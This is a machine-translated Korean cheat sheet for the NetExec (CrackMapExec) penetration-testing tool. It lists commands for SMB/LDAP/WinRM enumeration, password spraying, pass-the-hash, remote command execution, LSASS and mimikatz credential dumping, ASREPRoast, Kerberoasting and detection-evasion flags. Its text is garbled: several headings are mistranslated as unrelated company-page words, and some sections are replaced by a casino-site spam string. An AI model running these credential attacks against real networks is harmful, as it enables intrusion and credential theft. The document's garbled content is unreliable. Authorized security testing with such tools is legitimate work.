네트워크

All 모든 명령 복사 < PDF 생성

NetExec (이전 CrackMapExec)는 네트워크 프로토콜 남용 및 자격 공격을 통해 큰 Active Directory 네트워크의 보안을 평가하는 데 도움이되는 포스트 폭발 도구입니다.

설치 및 설치

Command	Description
pip3 install netexec	Install NetExec via pip
pipx install netexec	Install with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.git	Clone from GitHub
cd NetExec && pip3 install .	Install from source
netexec --version	Check installed version
netexec --help	Display help information

기본 사용

Command	Description
netexec smb 192.168.1.0/24	Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p password	Authenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhash	Authenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p ''	Anonymous authentication
netexec smb targets.txt -u username -p password	Use target file

Protocol 지원

SMB 프로토콜

Command	Description
netexec smb 192.168.1.100	Basic SMB enumeration
netexec smb 192.168.1.100 --shares	Enumerate shares
netexec smb 192.168.1.100 --users	Enumerate users
netexec smb 192.168.1.100 --groups	Enumerate groups
netexec smb 192.168.1.100 --local-groups	Enumerate local groups
netexec smb 192.168.1.100 --sessions	Enumerate sessions
netexec smb 192.168.1.100 --disks	Enumerate disks

WinRM 프로토콜

Command	Description
netexec winrm 192.168.1.100 -u username -p password	WinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami"	Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1	Execute PowerShell script

LDAP 프로토콜

Command	Description
netexec ldap 192.168.1.100 -u username -p password	LDAP authentication
netexec ldap 192.168.1.100 -u username -p password --users	Enumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groups	Enumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computers	Enumerate computers

MSSQL 프로토콜

Command	Description
netexec mssql 192.168.1.100 -u username -p password	MSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"	Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-auth	Local authentication

SSH 프로토콜

Command	Description
netexec ssh 192.168.1.100 -u username -p password	SSH authentication
netexec ssh 192.168.1.100 -u username -k id_rsa	SSH key authentication
netexec ssh 192.168.1.100 -u username -p password -x "id"	Execute command

인증 방법

비밀번호 인증

Command	Description
netexec smb 192.168.1.100 -u username -p password	Single credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txt	Credential lists
netexec smb 192.168.1.100 -u username -p passwords.txt	Password spraying
netexec smb 192.168.1.100 -u users.txt -p password	User enumeration

Hash 인증

Command	Description
netexec smb 192.168.1.100 -u username -H ntlmhash	NTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash	LM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txt	Hash lists

Kerberos 인증

Command	Description
netexec smb 192.168.1.100 -u username -p password -k	Kerberos authentication
netexec smb 192.168.1.100 -u username --use-kcache	Use Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberos	Force Kerberos

회사연혁

회사연혁

Command	Description
netexec smb 192.168.1.100 --shares	List shares
netexec smb 192.168.1.100 --shares -u username -p password	Authenticated share listing
netexec smb 192.168.1.100 --spider SHARE	Spider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt"	Search for files

회사 소개

Command	Description
netexec smb 192.168.1.100 --users	Enumerate users
netexec smb 192.168.1.100 --rid-brute	RID bruteforce
netexec smb 192.168.1.100 --users --rid-brute 1000-2000	RID range

그룹소개

Command	Description
netexec smb 192.168.1.100 --groups	Enumerate groups
netexec smb 192.168.1.100 --local-groups	Local groups
netexec smb 192.168.1.100 --groups "Domain Admins"	Specific group

컴퓨터 Enumeration

Command	Description
netexec ldap 192.168.1.100 --computers	Enumerate computers
netexec smb 192.168.1.100 --computers	SMB computer enumeration

명령 실행

SMB 명령 실행

Command	Description
netexec smb 192.168.1.100 -u username -p password -x "whoami"	Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1	Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec	Use WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec	Use SMB execution

WinRM 명령 실행

Command	Description
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process"	PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1	Execute script

모듈

내장 모듈

Command	Description
netexec smb 192.168.1.100 -M spider_plus	Enhanced spidering
netexec smb 192.168.1.100 -M enum_avproducts	Enumerate AV products
netexec smb 192.168.1.100 -M gpp_password	Group Policy Preferences
netexec smb 192.168.1.100 -M lsassy	LSASS dumping
netexec smb 192.168.1.100 -M mimikatz	Mimikatz execution

모듈 옵션

Command	Description
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false	Module options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true	Bloodhound output

Database 운영

Command	Description
netexec smb 192.168.1.100 --users --export users.csv	Export to CSV
netexec db	Database management
netexec db --workspace default	Set workspace
netexec db --clear-database	Clear database

고급 기능

Credential 청소

Command	Description
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success	Continue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3	Fail limit

비밀번호

Command	Description
netexec smb 192.168.1.100 --pass-pol	Get password policy
netexec ldap 192.168.1.100 --pass-pol	LDAP password policy

Bloodhound 통합

Command	Description
netexec ldap 192.168.1.100 -u username -p password --bloodhound	Collect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All	All collections

ASREP로스트

Command	Description
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt	ASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt	Authenticated ASREPRoast

채용정보

Command	Description
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt	Kerberoasting attack

산출과 로깅

Command	Description
netexec smb 192.168.1.100 --verbose	Verbose output
netexec smb 192.168.1.100 --debug	Debug output
netexec smb 192.168.1.100 -o output.txt	Save output to file
netexec smb 192.168.1.100 --log logs/	Log directory

제품 설명

Config 파일 (~/.nxc/nxc.conf)

카지노사이트

프로토콜 별 옵션

Command	Description
netexec smb 192.168.1.100 --port 445	Custom port
netexec smb 192.168.1.100 --timeout 5	Connection timeout
netexec smb 192.168.1.100 --threads 100	Thread count

Evasion 기술

Command	Description
netexec smb 192.168.1.100 --jitter 1-5	Random delay
netexec smb 192.168.1.100 --delay 2	Fixed delay
netexec smb 192.168.1.100 --obfs	Obfuscation

일반 공격 Scenarios

도메인 Enumeration

카지노사이트

Credential 공격

카지노사이트

포스트 폭발

카지노사이트

다른 도구와 통합

Impacket 통합

Command	Description
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec	Use Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec	Use Impacket SMB

Crackmapexec 마이그레이션

Command	Description
netexec --convert-cme-db	Convert CME database
alias cme='netexec'	Create alias for compatibility

문제 해결

Command	Description
netexec --help	General help
netexec smb --help	Protocol-specific help
netexec -v	Version information
netexec --debug smb 192.168.1.100	Debug mode

최고의 연습

• 사용 가능한 경우 enumeration 전에 인증
• 검출을 방지하기 위해 적절한 지연을 구현
• 다른 참여를 구성하기 위해 workspaces를 사용합니다.
• 더 분석을위한 수출 결과
• 종합 평가를 위한 다른 도구와 결합
• 방어적인 응답을 위한 감시자
• 압도적인 표적을 피하기 위하여 적합한 실 조사를 사용하십시오
• 자주 묻는 질문
• 대규모 공격 전에 자격 증명
• 필요한 경우 obfuscation 기법 사용

보안 고려 사항

• 공인된 네트워크에서만 사용
• 적절한 액세스 제어 구현
• 보안 도구에 의한 탐지 모니터링
• 최소한의 권한 원칙
• 규정 준수에 대한 모든 활동
• 적용 가능한 경우 파란색 팀과의 협조
• 적절한 정리 절차 구현
• 보관 자격 증명
• 가능한 경우 암호화 통신
• 자주 묻는 질문